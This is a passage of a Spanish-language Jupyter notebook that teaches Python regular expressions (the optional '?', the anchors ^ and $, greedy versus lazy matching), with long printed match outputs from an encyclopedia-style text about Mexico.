cantidad fija de repeticiones\nexpresion_llaves = re.compile(r\".9{2,}.\")\nbusqueda = expresion_llaves.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "1994\n1994\n1994\n1997\n1994\n1994\n1995\n 990\n1990\n1995\n1990\n1993\n1992\n1994\n1999;\n1993\n1990\n1992\n1992\n1990\n1994\n1996\n1992\n1994\n1992\n1996\n" ] ], [ [ "Aquí también vale la pena hablar de otro símbolo similar: `?`. No es exactamente un repetidor ya que solo acepta 0 o 1 aparición, es decir, hace que un caracter sea opcional.", "_____no_output_____" ] ], [ [ "expresion_interrogacion = re.compile(r\"años?\")\nbusqueda = expresion_interrogacion.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "año\naños\naños\naños\naño\naño\naño\naño\naño\naño\naños\naño\naño\naño\naño\naño\naño\naño\naños\naño\naño\naño\naño\naño\naño\naño\naños\naño\naño\naño\naños\naños\naño\naño\naño\naño\naños\naños\naños\naño\naño\naños\naños\naños\naño\naño\naño\naños\naño\naños\naño\naño\naño\naño\naño\naños\naños\naños\naños\naño\naño\naño\naños\naño\naños\naños\naño\naño\naño\naño\naño\naño\naño\naño\naños\naño\naño\naños\naño\naños\naños\naño\naños\naño\naños\naño\naños\naños\naño\naño\naños\naños\naño\naño\naño\naño\naño\naño\naño\naños\naño\naño\naño\naño\naño\naño\naños\naño\naños\naños\naño\naño\naño\naño\naño\naño\naños\naño\naños\naños\naños\naños\naños\naños\naño\naños\naños\naño\naño\naño\naño\naño\naños\naños\naño\naño\naño\naños\naños\naños\naño\naño\naño\naño\naño\naño\naño\naño\naño\naño\naños\naños\naño\naño\naños\naños\naños\n" ] ], [ [ "#### Posición", "_____no_output_____" ], [ "Las expresiones regulares también tienen símbolos especiales para indicar posición, en particular podemos hablar del inicio y final del texto. La versión, en expresión regular, de las funciones `s.startswith()` y `s.endswith()`. Los símbolos son `^` y `$` respectivamente", "_____no_output_____" ] ], [ [ "# Es mejor manejar el texto segmentado para este experimento\nsegmentado = texto.split(\"\\n\")\n\nexpresion_inicio = re.compile(r\"^......\")\nexpresion_fin = re.compile(r\"......$\")\n\nfor segmento in segmentado:\n resultado_inicio = expresion_inicio.search(segmento)\n resultado_fin = expresion_fin.search(segmento)\n\n if resultado_inicio and resultado_fin:\n\n print(resultado_inicio.group(0))\n print(resultado_fin.group(0))\n\n print(\"############\")", "<doc i\nxico\">\n############\nMéxico\nMéxico\n############\nMéxico\neral).\n############\nEl ter\n con .\n############\nMéxico\nmundo.\n############\nLa pre\nítico.\n############\nSegún \nundo. \n############\nEn tér\nmundo,\n############\nMéxico\nmicas.\n############\nEl pri\nulos. \n############\nLos do\nncia. \n############\nDesde \ncomún.\n############\nEl gen\ncanos.\n############\n\"Méxic\nforma:\n############\nFranci\ntecas.\n############\nEl ter\nérica.\n############\nLos oa\nuahua.\n############\nLos ha\n. C.).\n############\nEl ini\ngodón.\n############\nLos ol\nticas.\n############\nEl cen\nVenta.\n############\nLa Ven\nirlas.\n############\nEl cen\niores.\n############\nSe pie\niapas.\n############\nEl per\nTikal.\n############\nLas ci\nrinos.\n############\nTeotih\nteca).\n############\nLos ar\nguras.\n############\nLos te\nellos.\n############\nLos te\nioses:\n############\nSe des\nernos.\n############\nEn su \nicios.\n############\nLos ar\nguras.\n############\nLa ciu\nAlbán.\n############\nTeotih\ncóatl.\n############\nLa cul\n cero.\n############\nHabitó\n tres:\n############\nLos ma\nuerte.\n############\nEn su \nuerra.\n############\nPor ra\nbismo.\n############\nLa rel\nerte).\n############\nLas ci\nación.\n############\nLos ma\nlifos.\n############\nOtros \nillas.\n############\nLos ma\nscado.\n############\nLa cul\nricos.\n############\nSu ciu\nAlbán.\n############\nLa soc\ndades.\n############\nTenían\narios:\n############\nEran p\n eran:\n############\nLa soc\nuerra.\n############\nEl per\nicios.\n############\nLa cul\nlenta.\n############\nOtra c\nxteca.\n############\nHacia \niosas.\n############\nLa cul\nñoles.\n############\nDespué\njeros.\n############\nLos es\nural\".\n############\nUna ve\nspaña.\n############\nEn 152\n1761).\n############\nLa bas\nperio.\n############\nEl com\nitido.\n############\nEl vir\nmicos.\n############\nLa soc\nla fe.\n############\nEl ter\ntecas.\n############\nA pesa\nlidad.\n############\nLa ocu\nlados.\n############\nEl mov\n 1815.\n############\nA part\n 1821.\n############\nDespué\nntral.\n############\nEl Con\ngimen.\n############\nEl pre\n 1848.\n############\nMéxico\nierno.\n############\nLa pro\nétaro.\n############\nBenito\ncatán.\n############\nAlguno\nltado.\n############\nEn feb\n1923).\n############\nCarran\nndial.\n############\nDurant\nstado.\n############\nAl fin\nación.\n############\nSalió \nnidad.\n############\nSu obj\nEZLN).\n############\nEn 200\nocial.\n############\nEl exj\ndores.\n############\nMéxico\ns dos.\n############\nEl sis\n INAI)\n############\nEl Pre\nmadas.\n############\nEs ele\n-2024.\n############\nLa vig\nrales.\n############\nEl Con\nores–.\n############\nLa vig\nales. \n############\nLas fa\n IFT).\n############\nLas fa\nional.\n############\nEl Pod\n etc.)\n############\nLa Sup\nderes.\n############\nLa vig\niones.\n############\nLas en\nopios.\n############\nLos es\nopias.\n############\nLa org\nnomos.\n############\nLos es\nlo 5. \n############\nAl mis\niento.\n############\nTambié\nitana.\n############\nLa Ciu\nodo lo\n############\nconcer\nestos.\n############\nLa act\nipios.\n############\nLa rep\nales. \n############\nEn el \nistro.\n############\nEn su \nerior.\n############\nEn muc\n país.\n############\nA lo l\nragua.\n############\nDesde \ncanas.\n############\nMéxico\nnesco.\n############\nEl paí\nversa.\n############\nLas Fu\nlica. \n############\nEstán \nxico).\n############\nEl \"Ma\nrales.\n############\nEsta e\nndial.\n############\nPara e\nSEMAR.\n############\nMéxico\nnidos.\n############\nEl paí\ndades.\n############\nEl rel\nicana.\n############\nEl ter\nl Sur.\n############\nEl Eje\nmundo.\n############\nLas pr\n17 m).\n############\nLos ac\nllana.\n############\nUbicad\nicana.\n############\nEntre \niones.\n############\nRepart\n73km².\n############\nMéxico\n país.\n############\nDe est\netros.\n############\nEl cli\nñosas.\n############\nUn seg\ncatán.\n############\nEl tró\néxico.\n############\nLas zo\nticas.\n############\nLa est\n00 mm.\n############\nEl pro\nremas.\n############\nLos rí\néxico.\n############\nEn el \ngable.\n############\nMéxico\naxaca.\n############\nMéxico\nndial.\n############\nMéxico\ntemas.\n############\nEn Méx\ncies).\n############\nUno de\nlo XX.\n############\nDurant\niglos.\n############\nEl pro\nrutos.\n############\nA fina\nación.\n############\nEn ese\nicano.\n############\nTras e\nicano.\n############\nSin em\nidos).\n############\nLa era\nterna.\n############\nLos re\nríodo.\n############\nNo obs\nlares.\n############\nAsimis\nrismo.\n############\nLos an\ne año.\n############\nLa cre\nabajo.\n############\nDe las\nsonas.\n############\nAdemás\nlares.\n############\nLa mac\niales.\n############\nSegún \nmicas.\n############\nConfor\nicano.\n############\nAdemás\nrasil.\n############\nSin em\nróleo.\n############\nDesde \nJapón.\n############\nMéxico\nmicas.\n############\nLa ind\nérica.\n############\nA fina\nrrano.\n############\nEn jun\ntarlo.\n############\nEn feb\nervas.\n############\nEl tur\nnidos.\n############\nLas pr\nativa.\n############\nEn la \nicano.\n############\nLa Sec\nnores.\n############\nDebido\nentes.\n############\nEl ent\n país.\n############\nAunque\nLucas.\n############\nMéxico\nbreza.\n############\nEn Méx\nbreza.\n############\nPor ot\no año.\n############\nSegún \nmedio.\n############\nEn Méx\nolera.\n############\nLa pri\nr kWh.\n############\nMéxico\nrieto.\n############\nSegún \ntrica.\n############\nEn Méx\nctual.\n############\nLa lon\npulco.\n############\nRecien\naneca.\n############\nLa may\ngicos.\n############\nComo e\néxico.\n############\nEl 14 \niales.\n############\nComo l\nífico.\n############\nLos me\nional.\n############\nEn rad\nulada.\n############\nLa tel\nvadas.\n############\nEn lo \n país.\n############\nLas pr\nradio.\n############\nMéxico\nCarso.\n############\nEn Méx\nonal».\n############\nExiste\netro\".\n############\nEn Méx\nabado.\n############\nLas pr\niente:\n############\nHay un\nseis).\n############\nEn alg\nncias.\n############\nLa rad\ns son:\n############\nEn Méx\nntran:\n############\nEl ser\nlemas:\n############\nDurant\nicana.\n############\nLa tas\n2000).\n############\nTambié\noense.\n############\nLas ár\n como:\n############\nCabe s\nipios.\n############\nPocas \ncruz).\n############\nLa sig\n 2010.\n############\nSi se \nsonas.\n############\nMéxico\nyente.\n############\nLa pol\ncanos.\n############\nEl cri\nundo\".\n############\nLas ci\notros.\n############\nLa com\nantes.\n############\nEn Méx\naxaca.\n############\nSobre \notras.\n############\nLa inm\nubros.\n############\nMéxico\nonora.\n############\nInicia\nicano.\n############\nMéxico\n 2016.\n############\nMéxico\nlosos.\n############\nCifras\n 2019:\n############\nCifras\n2020: \n############\nMéxico\nólico.\n############\nLa déc\nítica.\n############\nSegún \n2010).\n############\nLa seg\ndoxas.\n############\nSegún \nnuevo.\n############\nLa pro\nNEGI).\n############\nEn cie\ndalgo.\n############\nUn arg\nniños.\n############\nExiste\npañol.\n############\nEs tam\nancún.\n############\nEn el \n país.\n############\nEn muc\n, etc.\n############\nEl imp\nistas.\n############\nLa Ley\nntero.\n############\nUn 7% \ningüe.\n############\nDebido\nmundo.\n############\nDe las\noacia.\n############\nOtro c\npeche.\n############\nEl fra\niacán.\n############\nSe tie\najara.\n############\nLa cif\nngües.\n############\nExiste\npañol.\n############\nSalvo \nticia.\n############\nSe est\njuana.\n############\nHasta \ncanos.\n############\nEn 201\n país.\n############\nMéxico\nzteca.\n############\nLa Con\n 1921.\n############\nMéxico\nlador.\n############\nEn el \n país.\n############\nEl 21 \n país.\n############\nEl Him\ntoria.\n############\nEn tér\nicana.\n############\n\"Lo me\nicano.\n############\nLa con\nedad\".\n############\nAlguno\nético:\n############\nEn el \n años.\n############\nLa ópe\nistas.\n############\nDesde \notros.\n############\nLa dif\ncanos.\n############\nAlguno\nnchez.\n############\nLa mús\notros.\n############\nIntern\nbriel.\n############\nEl son\nruana.\n############\nEl \"ja\n, etc.\n############\nA prin\no XIX.\n############\nEl bol\nridad.\n############\nDentro\nllano.\n############\nOtras \ncales.\n############\nLa mús\nticas.\n############\nLa mús\ncampo.\n############\nEl mar\nisión.\n############\nLa mús\nzador.\n############\nLa mús\n país.\n############\nLa dan\nores).\n############\nDurant\nxcala.\n############\nDurant\ngenas.\n############\nDe tod\nailes.\n############\nLa lit\nómica.\n############\nEn el \notros.\n############\nLas et\ncelos.\n############\nLa pin\nAlbán.\n############\nLa pin\nocino.\n############\nPor un\nistas.\n############\nLa pin\nuelas.\n############\nLa pin\no XXI.\n############\nAlguno\nficos.\n############\nA lo l\nngton.\n############\nLa esc\ngioso.\n############\nA part\nropeo.\n############\nEl rom\nropia.\n############\nDurant\nngton.\n############\nLa pre\nental.\n############\nEl urb\nkbés\".\n############\nCon la\nrabes.\n############\nEn el \nánica.\n############\nLa arq\njismo.\n############\nLa Esc\nional.\n############\nLa arq\nional.\n############\nLos ob\npular.\n############\nAlguna\ns son:\n############\nLas pe\nueroa.\n############\nCabe m\nnjera.\n############\nEl cin\nbezki.\n############\nEl pri\norias.\n############\nEn 200\nnidad.\n############\nEl ori\ncanos.\n############\nDe ese\n país.\n############\nAlguna\nquila.\n############\nLa his\néxico.\n############\nLas in\nabaza.\n############\nLas to\ncanas.\n############\nMuchas\nrveza.\n############\nSegún \niento.\n############\nMéxico\nNobel:\n############\nEn Méx\naxaca.\n############\nLa ley\nN.A.H.\n############\nA fina\néxico.\n############\nDe acu\nl PIB.\n############\nEl 20 \n 2010.\n############\nCon fr\nitiva.\n############\nAlguno\nn aro.\n############\nSi bie\nONEFA.\n############\nEl dep\nmenil.\n############\nLa sel\nnados.\n############\nLa sel\n 2007.\n############\n\"Nota.\nbol\".\"\n############\nOtro d\ncanas.\n############\nOtras \n\"LMP\".\n############\nEn el \ntalia.\n############\nEn la \n 1951.\n############\n\"Nota.\nbol\".\"\n############\nEl seg\n 1936.\n############\nEn el \n 1955.\n############\n\"Nota.\nbol\".\"\n############\nEn el \nétaro.\n############\nDe for\nporte.\n############\nLa Lig\néxico.\n############\nLa pel\ntotal.\n############\nBasta \n 1990.\n############\nEn la \nnales.\n############\nLa Fed\nonil).\n############\nLa Ciu\nmundo.\n############\nEs la \ntenis.\n############\nMéxico\n 1992.\n############\nEl box\nblico.\n############\nLa fie\néxico.\n############\nOtros \nuárez.\n############\nMéxico\nortes.\n############\nMéxico\n 2008.\n############\nEntre \níguez.\n############\nAsimis\nstado.\n############\nDesde \nencia.\n############\nPese a\néxico.\n############\nMéxico\nSmaga.\n############\nOtras \no son:\n############\nGuille\nParís.\n############\nPor ot\nables.\n############\nMéxico\nleton.\n############\nMéxico\nedrez.\n############\n</doc>\n</doc>\n############\n" ] ], [ [ "Si no segmentamos el texto, solamente vamos a obtener los primeros y últimos seis caracteres de todo el texto, de esta manera obtenermos los primeros y últimos de cada línea.", "_____no_output_____" ], [ "#### Miscelaneos", "_____no_output_____" ], [ "Lamentablemente, los símbolos que quedan tienen todos efectos particulares y ya no los pude agrupar más. Pero vamos a empezar con uno que ya conocemos: `?`. Porque puede tener otro significado que el que vimos; el signo de interrogación puede ser usado junto con los símbolos repetidores y cambia su comportamiento.", "_____no_output_____" ] ], [ [ "expresion_sinInterrogacion = re.compile(r\"\\(.*\\)\")\nexpresion_conInterrogacion = re.compile(r\"\\(.*?\\)\")\n\nbusqueda_sinInterrogacion = expresion_sinInterrogacion.finditer(texto)\nbusqueda_conInterrogacion = expresion_conInterrogacion.finditer(texto)\n\nfor resultado in busqueda_sinInterrogacion:\n print(resultado.group(0))\n\nprint('''\n ############\n ############\n ############\n''')\n\nfor resultado in busqueda_conInterrogacion:\n print(resultado.group(0))", "(), oficialmente Estados Unidos Mexicanos, es un país soberano ubicado en la parte meridional de América del Norte con capital en la Ciudad de México. Políticamente es una república representativa, democrática, federal y laica, compuesta por 32 entidades federativas (31 estados y la capital federal)\n(principalmente el segundo tercio)\n(PIB) es la decimocuarta economía mundial y la undécima por (PPA)\n(Capitanía General de Guatemala, Cuba, Florida, Puerto Rico y la parte española de la isla de Santo Domingo —hoy República Dominicana—), asumiendo con ello, que ese era el espacio geográfico sobre el cual se constituiría la nueva nación.Posteriormente el Decreto Constitucional para la Libertad de la América Mexicana del 22 de octubre de 1814 cambió dicha denominación, adaptándola con el término \"México\" (usado como adjetivo)\n(Plan de Iguala y Tratados de Córdoba), usaron los dos términos antes mencionados (América Septentrional y América Mexicana)\n(s. XVI) —quien es la fuente documental más antigua—, el vocablo significaría «el lugar de Mexi», de «\"Mexitl\"» donde «\"metl\"» (maguey), «\"citli\"»/«\"xitli\"» (liebre) y «\"-co\"» (locativo): Mexi o Mexitl, quien fuera un legendario sacerdote nahua, guió a sus seguidores por la búsqueda de un águila sobre un nopal para la fundación de su ciudad luego de abandonar la también legendaria locación de Aztlán. Sin embargo, actualmente la versión más extendida sobre el significado del vocablo es: «el ombligo de la luna» o «en el lugar del lago de la Luna», de «\"Metzxico\"»: «\"metz(tli)\"» (luna), «\"xic(tli)\"» (ombligo, centro) y «\"-co\"» (locativo)\n(12 000 a. C.) Cueva de la Candelaria (8000 a. C.), El Conchalito (1000 a. C.) y las cuevas de la Sierra de San Francisco (10 500 a. C.)\n(siglos XV-IV a. C.)\n(Estado de México)\n(Que significa «serpiente emplumada») y Tláloc (que significa: «néctar de la tierra», aunque a este Dios también lo veneraban en la cultura maya y zapoteca)\n(teocracia); sus dioses se relacionaban con los elementos naturales, los astros y las acciones humanas. Entre los dioses que sobresalieron esta: Hanub Kú (el dios creador de los mayas quiches), Itzamná (el dios creador de los mayas yucatecos), Ix Chebel Ya (dios del bordado y la pintura), Kakalcán (Quetzalcóatl) (dios del viento), Kin (dios del sol), Ixchel (diosa de la luna), Chac (dios del agua), Yum Kaax (dios del maíz y la agricultura), Ah Puch (dios de la muerte)\n(o aztecas)\n(1517) y Juan de Grijalva (1518)\n(1546), la Guerra del Mixtón (1540-1551), Rebelión de los Pericúes (1734-1737) y la rebelión de los mayas de Cisteil (1761)\n(notoriamente, Zacatecas y Guanajuato)\n(golfo de México) y Acapulco (océano Pacífico)\n(también llamado Monte Pío)\n(en especial desde la llegada de los Borbones, que propugnaron el modelo francés de colonización, contra los cuales los criollos o hijos de españoles nacidos en México empezaron a resentirse)\n(Guanajuato)\n(en cualquiera de sus variantes como bandos antagónicos: republicanos contra monárquicos y federalistas contra centralistas)\n(los actuales estados de California, Arizona, Nuevo México, Nevada y Utah; y porciones de Colorado, Oklahoma, Kansas y Wyoming). Al terminar la guerra prosiguieron los enfrentamientos entre facciones políticas, lo que propició la llegada por undécima y última ocasión de Santa Anna al poder (1853-1855)\n(1906) y Río Blanco (1907)\n(Tlaxcalantongo, 1920), Zapata (Chinameca, 1919) y Villa (Parral, 1923)\n(PNR), antecedente del Partido Revolucionario Institucional (PRI). En 1934 fue electo presidente Lázaro Cárdenas del Río para el primer período sexenal (1934-1940)\n(1988-1994)\n(CCRI-CG) del EZLN. El 22 de diciembre de 1997 45 indígenas tzotziles fueron asesinados mientras oraban en una iglesia de la comunidad de Acteal, en el estado de Chiapas. Los responsables directos de la masacre fueron grupos paramilitares opuestos al Ejército Zapatista de Liberación Nacional (EZLN)\n(y estos por Municipios) en todo lo concerniente a su régimen interior, y por la Ciudad de México (capital del país); unidos en una federación establecida según los principios de su Constitución. De acuerdo con esta ley fundamental, la soberanía y el poder público son origen y correspondencia del pueblo, y es este el que decide ejercerlo a través de un sistema de separación de poderes: Presidente (Ejecutivo), Congreso de la Unión (Legislativo)\n(Fiscalía General de la República, CNDH, Auditoria Superior de la Federación, Banco de México, INEGI, Cofece, IFT e INAI)\n(si la ausencia es el día de la toma de posesión, sería el presidente del Senado, el mandatario provisional)\n(y repartida entre las dos cámaras)\n(excepto el Presidente, cuestión que corresponde al Senado) en caso de cometer un delito, en los términos del artículo 111 constitucional; designar a los titulares de los órganos autónomos (INE, CNDH, Auditoria Superior, Banco de México, INEGI, Cofece e IFT)\n(a través de la Guardia Nacional)\n(abarcando catorce artículos) de la Constitución Política de los Estados Unidos Mexicanos y la \"Ley Orgánica del Poder Judicial de la Federación\". El Jurado Federal de Ciudadanos y los tribunales de los Estados y de la Ciudad de México, pueden actuar en auxilio de la Justicia Federal, en los casos previstos por la Constitución y las leyes. La administración, vigilancia y disciplina del Poder Judicial de la Federación, con excepción de la Suprema Corte de Justicia y el Tribunal Electoral, está a cargo del Consejo de la Judicatura Federal. En este poder y su conjunto de órganos, se deposita la facultad de impartir justicia en todos los aspectos institucionales del estado mexicano; la aplicación de las normas y principios jurídicos en la resolución de conflictos; y en todos los ámbitos de la aplicación del Derecho y la interpretación de las leyes en la sociedad (civil, penal, constitucional, mercantil, laboral, administrativo, fiscal, procesal, etc.)\n(policía estatal y guardia nacional adscrita)\n(ayuntamiento)\n(espacio aéreo, mares e ). Entendiendo este concepto como un ordenamiento de división política, el país se compone de 32 entidades federativas (31 estados y la Ciudad de México, capital de la república)\n(Instituto Nacional Electoral, Tribunal electoral y Fiscalía electoral). El INE (bajo su anterior denominación \"IFE\")\n(PRD), el Partido Acción Nacional (PAN), el Partido Revolucionario Institucional (PRI), el Partido del Trabajo (PT), el Partido Verde Ecologista de México (Verde), el partido Movimiento Ciudadano (MC) y el Partido MORENA (Movimiento Regeneración Nacional)\n(2000-2006), la política exterior de México se orientó a proyectar una nueva imagen de México al mundo y favorecer la relación con Estados Unidos. México buscó protagonismo donde no lo había tenido por decisión propia, por ejemplo, postulando fallidamente a Luis Ernesto Derbez a la Secretaría General de la Organización de Estados Americanos (OEA). El acercamiento de la administración foxista hacia Estados Unidos fue acompañado por el distanciamiento respecto a América Latina. Con la llegada de Calderón a la presidencia hubo un cierto acercamiento con América Latina (particularmente con Cuba, Venezuela, Bolivia y Ecuador)\n(y todos los organismos conexos del sistema de Naciones Unidas)\n(ningún otro país del mundo tiene un número similar en una sola nación receptora)\n(a cargo del Ejército Mexicano y la Fuerza Aérea Mexicana)y Secretaría de Marina (a cargo de la Armada de México)\n(para las dos primeras ramas)\n(a 3395 msnm de altitud). En el Eje Neovolcánico, de gran actividad volcánica como su nombre lo indica, se ubican los picos más altos de México: el Pico de Orizaba o Citlaltépetl (5610 m), el Popocatépetl (5462 m), el Iztaccíhuatl (5286 m), el Nevado de Toluca (4690 m) La Malinche (4461 m) y el Nevado de Colima (4340 m)\n(4117 m)\n(2054 m)\n(Socorro, Clarión, San Benedicto, roca Partida)\n(una zona tropical y una templada)\n(que concentra el 80% de la población mexicana)\n(12 °C) y julio (16,1 °C)\n(1885 millas)\n(ecosistemas inalterados), 64 parques nacionales, 4 monumentos naturales, 26 áreas para proteger la flora y la fauna, 4 áreas para la protección natural y 17 santuarios (zonas con rica diversidad de especies)\n(20 hembras y 3 machos)\n(de las que a la fecha solo se conservan dos: Pemex y la Comisión Federal de Electricidad), y un crecimiento económico dependiente de las exportaciones de manufacturas (básicamente, hacia Estados Unidos)\n(NAFTA, por sus siglas en inglés, o TLCAN), que firmó con los Estados Unidos y con Canadá. México también cuenta con un tratado de libre comercio con la Unión Europea, con el bloque denominado EFTA (Luxemburgo, Suiza, Liechtenstein y Noruega)\n(\"World Government Bond Index\", en inglés)\n(exploración, refinación, comercialización y exportación) por la empresa estatal Pemex (Petróleos Mexicanos)\n(particularmente la española)\n(TTCI por sus siglas en inglés)\n(H1N1)\n(H1N1)\n(Coneval)\n(CFE), organismo que a partir de octubre de 2009, en una acción que generó mucha polémica, tomó control del área geográfica (centro del país) que hasta entonces administraba la Compañía de Luz y Fuerza del Centro (LFC). La CFE está encargada, como su nombre lo indica, de la operación de las plantas generadoras de electricidad y su distribución en todo el territorio nacional. La otra empresa encargada de la explotación de los recursos energéticos es Petróleos Mexicanos (Pemex)\n(a diciembre de 2007)\n(PEMEX)\n(CAPUFE)\n(Imevisión), aunque desde el inicio los particulares tuvieron derecho a concesiones. En la actualidad, existen tres empresas televisivas privadas que acaparan la mayor parte del mercado (Televisa, TV Azteca e Imagen Televisión)\n(IMER)\n(nacional e internacional)\n(Internet)\n(\"100 mexicanos dijeron\" y \"Qué dice la gente\"), \"Big Brother\", \"Operación Triunfo\" y \"La Voz... México\". Las demostraciones nacionales de las noticias como las noticias de Adela en Televisa se asemejan a un híbrido entre Donahue y Nightline (programas estadounidenses)\n(en orden alfabético)\n(SPR). Además de las empresas privadas, existen otros operadores tanto públicos como privados con cadenas de menor cobertura (destacando, Multimedios Televisión y Canal 13.1 HD de Telsusa)\n( y solo 1 hay en San Luis Potosí), 852 estaciones son de Amplitud Modulada y 728 estaciones son de Frecuencia Modulada. Los estados con más estaciones son: Sonora y Oaxaca (tienen hasta 100 estaciones en todo el estado). El estado con menos estaciones de radio es Tlaxcala (solo seis)\n(Ensenada, Mexicali y Tijuana)\n(1950-1980). La población mexicana se duplicaba en veinte años, y a ese ritmo se esperaba que para el año 2000 hubiera 120 millones de mexicanos. Ante esta situación, el gobierno federal creó el Consejo Nacional de Población (CONAPO), con la misión de establecer políticas de control de la natalidad y realizar investigaciones sobre la población del país. Las medidas resultaron exitosas, y la tasa de crecimiento descendió hasta 1.6 en el período de 1995 a 2000. La esperanza de vida pasó de 36 años (en 1895) a 72 años (en el año 2000)\n(pueblos, rancherías, caseríos). El censo de 1960 arrojó datos en los que la población urbana era por primera vez mayor que la rural (50,6% del total)\n(Coahuila y Durango), y Tampico (Tamaulipas y Veracruz)\n(1925)\n(Inegi) y por la Comisión Nacional para el Desarrollo de los Pueblos Indígenas (anteriormente el Instituto Nacional Indigenista) (INI)\n(1 de cada 100 habitantes)\n(Estados Unidos y Guatemala)\n(IISS)\n(SESNSP)\n(Iglesia católica y Estado)\n(casi 93 millones de adeptos según el censo de 2010)\n(Séptimo Día). Los fenómenos migratorios han propiciado la proliferación de diferentes vertientes del cristianismo, incluidas ramas protestantes históricas (como la Iglesia Anglicana, Presbiteriana, Metodista, Bautista)\n(en textos editados por la Universidad Nacional Autónoma de México), es notable la pervivencia de rituales de tipo mágico-religioso de los antiguos grupos indígenas, no solo en los indígenas actuales sino en los mestizos y blancos que conforman la sociedad mexicana rural y urbana. Existe frecuentemente un sincretismo entre el chamanismo y la tradición católica. Otra religión de sincretismo popular en México (sobre todo en los últimos años) es la santería. Esto se debe principalmente a la gran cantidad de cubanos que se asentaron en el territorio tras la Revolución cubana (principalmente en estados como Veracruz y Yucatán)\n(cerca del 3 por ciento del universo contemplado en los tabulados del INEGI)\n(el tequio o trabajo comunitario, la participación en las fiestas patronales y cuestiones similares)\n(ILV), en el año 1979, al cual se acusó de promover la división de los pueblos indígenas al traducir la Biblia a los idiomas vernáculos y evangelizar en un credo protestante que amenazaba la integridad de las culturas populares. El gobierno mexicano prestó atención al llamamiento de los antropólogos y canceló el convenio que tenía celebrado con el ILV. Los conflictos también se han dado en otros ámbitos de la vida social. Por ejemplo, dado que los Testigos de Jehová tienen prohibida la rendición de honores a los símbolos patrios (algo que en las escuelas públicas de México se realiza cada lunes)\n(en Polanco, Tecamachalco, Interlomas, Santa Fe, Satélite y en el Centro Histórico)\n(zen y tibetano)\n(la información varía según las diversas fuentes)\n(o \"Plattdeutsch\"), lengua clasificada como bajo sajón (o «bajo alemán»)\n(27.2% del total de discapacitados a nivel nacional)\n(29% de la población)\n(literatura), Alfonso García Robles (paz) y Mario J. Molina (química)\n(el carácter de lo mexicano, la mexicanidad, la definición de lo mexicano)\n(monocordio)\n(es decir, el traje de los ricos hacendados ganaderos). Interpretaban \"sones de mariachi\" hasta su llegada a la Ciudad de México, a principios del siglo XX donde se transformaron (y continúan haciéndolo)\n(huapango), son abajeño y muchos más. Géneros de aparición más tardía son la jarana y la trova yucateca, que se cultivan en la península de Yucatán, y que recibieron influencia caribeña (especialmente del son cubano) e incluso andina (bambuco colombiano)\n(algo así como una \"suite\" mexicana) el nombre viene del tiempo en el que los \"boticarios\" (farmacéuticos)\n(término no muy claro)\n(María del Rosario Graciela Rayas Trejo)\n(grupero)\n(o rock nacional, representado por Maná, El Tri, Molotov, Caifanes, Café Tacvba, Julieta Venegas y Panda, entre otros)\n(mariachi light)\n(de metales y alientos) en un fenómeno mediático y comercial, también urbano debido a la incesante migración de campesinos a las grandes ciudades. Junto con la \"Banda Sinaloense\", el género más difundido por algunos musicólogos representa la asimilación al sur del Estados Unidos a su vez \"chicanizado\" y tiene una enorme aceptación en todo el país. Consiste en una combinación de la música norteña con el \"country\" (que algunos etnomusicólogos afirman, nació en Coahuila)\n(cazadores)\n(para no ser reconocidos)\n(a partir de que la filosofía llega a las Universidades como disciplina de estudio profesional)\n(mayas, olmecas, toltecas, mixtecas, aztecas)\n(del náhuatl; obrero o alarife)\n(España-Marruecos)\n(1944)\n(declarada Memoria del Mundo por la UNESCO en 2003)\n(conocido en casi todo el mundo hispanoparlante como \"ají\")\n(biznaga)\n(menonitas)\n(\"¿Cuánto vale la cultura?\")\n(I.N.A.H.)\n(I.N.B.A.)\n(1993 y 2001)\n(escrito y pronunciado \"beisbol\", localmente), el cual según las últimas encuestas es el tercer deporte más popular en México. El béisbol es el deporte más popular en las regiones norte y sureste. México cuenta con varias ligas profesionales, entre las que destacan la Liga Mexicana de Béisbol (LMB) y la Liga Mexicana del Pacífico (LMP). La popularidad de la \"LMB\" se debe a que los equipos con los que cuenta están distribuidos por casi todo el país; es la de mayor tradición, pues fue fundada en 1925; y ha aportado la mayoría de los peloteros mexicanos que llegan a las Grandes Ligas, está afiliada a las Ligas Menores de los Estados Unidos bajo la clasificación 'AAA' y tiene su propia academia de desarrollo de talentos ubicada en El Carmen, Nuevo León; la conforman actualmente 16 equipos divididos en 2 zonas (Zona Norte y Zona Sur). La \"LMP\" se juega en invierno, por lo que su temporada es más corta y recibe a algunos de los peloteros (mexicanos y extranjeros)\n(LIV), cuyo equipo campeón representó a México en la Serie Latinoamericana, la Liga Invernal de Béisbol Nayarita (LIBN), la Liga Norte de México (LNM), la Liga Norte de Sonora (LNS), la Liga Mayor de Béisbol de La Laguna (LMBL), la Liga Estatal de Béisbol de Chihuahua (LEB), la Liga del Norte de Coahuila (LNC), la Liga Invernal Mexicana (LIM), la Liga Peninsular de Béisbol (LPB), la Liga Meridana de Invierno (LMI), la Liga Veracruzana Estatal de Béisbol (LVEB), cuyo equipo campeón representa en la actualidad a México en la Serie Latinoamericana, y la Liga Tabasqueña de Béisbol (LTB)\n(escrito y pronunciado \"basquetbol\", en el propio país); sin embargo, es el cuarto más popular, después del fútbol, el boxeo y el béisbol. Actualmente la liga más importante en el país en este deporte es la Liga Nacional de Baloncesto Profesional (LNBP), y en la rama femenil la Liga Mexicana de Baloncesto Profesional Femenil (LMBPF); además de algunas ligas regionales como el Circuito de Baloncesto de la Costa del Pacífico (CIBACOPA) y el Circuito de Baloncesto del Pacífico (CIBAPAC) que, como sus nombres lo indican, las componen equipos de esa zona, así como la Liga de Baloncesto del Sureste (LBS), que incluye a los equipos de esa parte del país, el Circuito de Básquetbol del Noreste (CIBANE), que como su nombre lo indica, lo componen equipos de esa región, la Liga Premier de Baloncesto (LPB) y la Liga de Básquetbol Estatal de Chihuahua (LBE), ambas con base en el estado de Chihuahua. Estas ligas regionales tienen participación en los meses de descanso de la \"LNBP\" que, dicho sea de paso, volverá a tener competencia ante el inminente regreso del Circuito Mexicano de Básquetbol (CIMEBA)\n(LMV) con el aval de la Federación Mexicana de Voleibol (FMVB), misma que entró en vigor en 2014 en ambas ramas, dando lugar a la Liga Mexicana de Voleibol Varonil (LMVV) y a la Liga Mexicana de Voleibol Femenil (LMVF). Esto con el objetivo de que ambos circuitos fueran la base para integrar a las selecciones nacionales de cara al ciclo olímpico de Río de Janeiro 2016, ya que se formaron equipos de varias partes del país con la finalidad de observarlos. No obstante, este no 